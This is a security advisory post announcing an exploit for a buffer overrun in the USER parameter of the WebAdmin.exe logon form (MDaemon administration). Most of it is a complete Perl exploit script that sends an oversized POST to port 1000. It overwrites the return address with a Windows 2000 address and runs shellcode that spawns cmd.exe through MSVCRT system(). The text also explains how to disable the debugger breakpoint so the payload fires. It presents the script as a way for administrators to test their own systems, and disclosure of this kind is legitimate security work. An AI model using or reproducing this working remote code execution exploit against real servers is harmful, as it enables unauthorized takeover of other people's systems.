Exploit Released for Buffer Overrun in WebAdmin.exe

Summary

WebAdmin allows administrators to securely manage MDaemon, RelayFax, and WorldClient from anywhere in the world. As we reported in our previous article, Remote System Buffer Overrun in WebAdmin.exe, there is a remotely exploitable buffer overrun in the USER parameter of the logon form. The following exploit code can be used by administrators to test their own systems for the vulnerability.

Credit:

The information has been provided by Noam Rathaus and Ami Chayun of SecurITeam Experts.


Details

Exploit:
The exploit code below connects to WebAdmin on TCP port 1000, posts an oversized User field to the logon form, and simply opens a cmd.exe shell on the target. The two addresses it depends on, the return address written over the saved EIP and the address of MSVCRT's system(), are hard-coded for Windows 2000, though the code is simple enough to modify for other addresses. Note that the shellcode begins with an INT3: that is a breakpoint for tracing the payload under a debugger. When no debugger is attached to WebAdmin.exe, replace it with a NOP (0x90), or the process will die on the breakpoint exception instead of spawning the shell.

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

unless (@ARGV == 1) { die "usage: $0 host ...\n" }
my $host = shift(@ARGV);
my $remote = IO::Socket::INET->new( Proto    => 'tcp',
                                    PeerAddr => $host,
                                    PeerPort => '1000',
                                  );
unless ($remote) { die "cannot connect to http daemon on $host\n" }

$remote->autoflush(1);

# Shellcode: writes "cmd.exe" onto the stack and calls MSVCRT.system() on it.
# The INT3 is a debugger breakpoint; change it to "\x90" when no debugger is
# attached, otherwise the breakpoint exception kills WebAdmin.exe.
my $shellcode = join ('',
    "\x90",                 # NOP
    "\xCC",                 # INT3
    "\x90",                 # NOP
    "\x90",                 # NOP
    "\x90",                 # NOP
    "\x90",                 # NOP
    "\x8B\xEC",             # MOV EBP, ESP
    "\x55",                 # PUSH EBP
    "\x8B\xEC",             # MOV EBP, ESP
    "\x33\xFF",             # XOR EDI, EDI
    "\x57",                 # PUSH EDI (zero, becomes the string terminator)
    "\x83\xEC\x04",         # SUB ESP, 4
    "\xC6\x45\xF8\x63",     # MOV BYTE PTR SS:[EBP-8],63h  'c'
    "\xC6\x45\xF9\x6D",     # MOV BYTE PTR SS:[EBP-7],6Dh  'm'
    "\xC6\x45\xFA\x64",     # MOV BYTE PTR SS:[EBP-6],64h  'd'
    "\xC6\x45\xFB\x2E",     # MOV BYTE PTR SS:[EBP-5],2Eh  '.'
    "\xC6\x45\xFC\x65",     # MOV BYTE PTR SS:[EBP-4],65h  'e'
    "\xC6\x45\xFD\x78",     # MOV BYTE PTR SS:[EBP-3],78h  'x'
    "\xC6\x45\xFE\x65",     # MOV BYTE PTR SS:[EBP-2],65h  'e'
    "\xB8\xC3\xAF\x01\x78", # MOV EAX, MSVCRT.system (0x7801AFC3, Windows 2000)
    "\x50",                 # PUSH EAX
    "\x8D\x45\xF8",         # LEA EAX, DWORD PTR SS:[EBP-8]
    "\x50",                 # PUSH EAX
    "\xFF\x55\xF4",         # CALL DWORD PTR SS:[EBP-C]  -> system("cmd.exe")
    "\x5F"                  # POP EDI
);

# Return address (0x0753BFD6, little-endian) that overwrites the saved EIP;
# Windows 2000 specific.
my $eip = "\xD6\xBF\x53\x07";

# 168 bytes of filler reach the saved return address.
my $data = join('', 'User=', 'A' x 168, $eip, $shellcode, 'A' x 1500,
                '&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In');

my $data_length = length($data);

# Each "\r" plus the literal line break yields the CRLF the HTTP request needs.
my $request = "POST /WebAdmin.dll?View=Logon HTTP/1.1\r
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r
Referer: http://localhost:1000/\r
Accept-Language: en-us\r
Content-Type: application/x-www-form-urlencoded\r
Accept-Encoding: gzip, deflate\r
User-Agent: MyUser Agent\r
Host: localhost\r
Content-Length: $data_length\r
Connection: Keep-Alive\r
Cache-Control: no-cache\r
Cookie: User=SECURITEAM; Lang=en; Theme=Standard\r
\r
$data";

print "Sending this [$request]\n";

print $remote $request;
sleep(1);

close $remote;

Categories: Exploits